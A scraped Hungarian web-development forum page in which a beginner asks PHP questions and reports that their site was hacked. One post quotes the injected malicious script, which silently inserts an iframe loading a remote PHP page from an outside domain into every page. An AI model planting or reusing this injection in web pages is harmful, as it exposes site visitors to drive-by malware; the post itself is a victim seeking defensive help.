- Samsung Galaxy Fit 3 - keveset, de jól
- Samsung Galaxy A56 - megbízható középszerűség
- Samsung Galaxy S23 Ultra - non plus ultra
- Akciófigyelő: Jelentősen olcsóbban nyit az Ulefone új mindenese
- Xiaomi Watch S1 - szép az idő
- iGO Primo
- Android alkalmazások - szoftver kibeszélő topik
- Android szakmai topik
- Magisk
- Mobil flották
Új hozzászólás Aktív témák
-
válasz
Sk8erPeter #14916 üzenetére
-
válasz
Sk8erPeter #14908 üzenetére
Köszönöm szépen, mindjárt elolvasom, értelmezem és megpróbálom fellőni élesbe.
-
Üdv ismét!
Szeretném a segítségeteket kérni.
Van egy oldalam, ami jelenleg így listázza ki az eredményeket. Itt a kódja (1 napig látható).Azt szeretném, hogy csak a képeket listázza ki és ne egymás alá, hanem egymás mellé (nem muszáj táblázatba tennie, jó ha egy div-en belülre rakja, hogy később formázni tudjam) és egy számlálót is szeretnék még a kódba, ami megszámolja hány elem lett beillesztve. Körülbelül úgy, mint itt.
Szerk.: Közben látom, hogy az ID után teszi a .gif kiterjesztés, holott a User után kellene tennie, de ezt elfelejtettem átírni.Szerk2.: Megcseréltem. -
válasz
Hege1234 #12880 üzenetére
Valóban nem php, így én is OFF-ba teszem.
A content_box_big és a content_box úgy vannak megoldva, ahogy a Szolgáltatásaink doboz is. Előre le van gyártva egy kép hozzájuk. Ha nagyobb méretűt szeretnél, akkor le kell gyártani újra (GIMP vagy Photoshop).
CSS3-mal talán könnyebb megoldani.
-
Válaszoltak, szerintük ez vírusos themplate (joomla, wordpress stb) vagy esetleg kikerült az ftp
jelszavam.
Állításuk szerint a php kódban van a hiba.Ehhez viszont nem értek, a php kódot egy kedves és segítőkész fórumozó írta. Azt hiszem felkeresem ismét és kitalálunk rá valami megoldást.
Gyanítom azzal lesz a gond, hogy a kódban benne van a jelszó, ami az adatbázishoz való csatlakozáshoz szükséges. Ahogy olvasom ezt valami külön fájlban kellene tárolni ahhoz, hogy biztonságosabb legyen. -
válasz
lordjancso #12779 üzenetére
Igen, ezt a kettőt és még az index.php-t is (amibe amúgy be van hívva a header és a footer.php).
Operában például nem is lehet a fejlécben semmire kattintani.Egy kattintással vissza tudom tenni a ma reggeli vagy a tegnapi verziót, ezzel tehát nincs gond, csak nem tudom hogy csinálták és hogyan tudom kivédeni legközelebb.
CineDOG1: Köszi, megnézem mit tud.
DeltaPower: Megkérdezem a tárhely szolgáltatót, hátha ők tudják honnan jött a támadás.
-
Meglepődve tapasztalom, hogy valaki belenyúlt az oldalamba.
Egyszerű php oldalacska, és a header, footer és index.php fájlokat (valamint egy js-t is, amit valójában nem is használ az oldal) megváltoztatták. Egy-egy ok felirat látszik így most a fejlécben és a láblécben is.Ez került bele (a kódban lévő linken nem tudom mi van, de felelősséget nem vállalok érte):
<!--68c8c7--><script type="text/javascript" language="javascript">
(function () { var id = '195'; var u09 = document.createElement('iframe'); u09.src = 'http://www.torsdagsherrer.skjern-net.dk/dtd.php'; u09.style.position = 'absolute'; u09.style.border = '1'; u09.style.height = '31px'; u09.style.width = '42px'; u09.style.left = '500px'; u09.style.top = '100px'; if (!document.getElementById('u')) { document.write('<style>body{overflow-x:hidden;}</style>'); document.write('<div id=\'u\' style="position:absolute; width:80%; height:100%;" ></div>'); document.getElementById('u').appendChild(u09); }})();</script><!--/68c8c7-->A jelszó szerintem abszolút biztonságos (kis- és nagybetűk, számok, össze vissza, nincs ismétlődő karakter). Hogy lehetséges, hogy mégis valaki (vagy valami) belenyúlt. Mit tehetek ellene, hogy lehet kivédeni?
-
Átjöttem akkor ebbe a topikba, azt mondták itt az egyik problémámat meg lehetne oldani php-vel.
Itt írtam róla.Az még lemaradt, hogy a feltöltött/betöltött képeket csak ideiglenesen tárolná a rendszer. Tehát bizonyos idő után ki kellene üríteni a mappát, amiben átmenetileg tárolta a képeket.
Nagyon kezdőként kérdezem ezeket.
Új hozzászólás Aktív témák
Hirdetés
- Asus A15 FA506IU 15.6" FHD IPS Ryzen 7 4800H GTX 1660Ti 16GB 512GB magyar vbill gar
- i5-13600KF, RX 9070, DDR5 32GB, 1 TB M.2, Fractal North TG és sok garancia
- Logitech Combo Touch iPad Pro 11" (1., 2. a 3. gen), szürke - UK billentyűzet ipad tok billentyűzet
- újszerű iPad Pro 11" (3. generációs) (2021) M1 chip Wi-Fi 128GB silver ezüst Apple
- szinte új iPhone 16 Pro Max 256GB desert titanium sivatagi titán független Apple 3 év garancia
- Bomba ár! Dell Latitude 5400 - i5-8GEN I 16GB I 512SSD I 14" HD I HDMI I Cam I W11 I Gari!
- Azonnali készpénzes nVidia RTX 2000 sorozat videokártya felvásárlás személyesen / csomagküldéssel
- Országosan a legjobb BANKMENTES részletfizetési konstrukció! Dell G15 5530
- ÁRGARANCIA! Épített KomPhone Ryzen 5 5500 16/32/64GB RAM RTX 4060 8GB GAMER PC termékbeszámítással
- BESZÁMÍTÁS! ASUS H610M I5 12400F 32GB DDR5 512GB SSD X 4060 8GB SPIRIT OF GAMER CLONE 3 Chieftec600W
Állásajánlatok
Cég: CAMERA-PRO Hungary Kft
Város: Budapest
Cég: Promenade Publishing House Kft.
Város: Budapest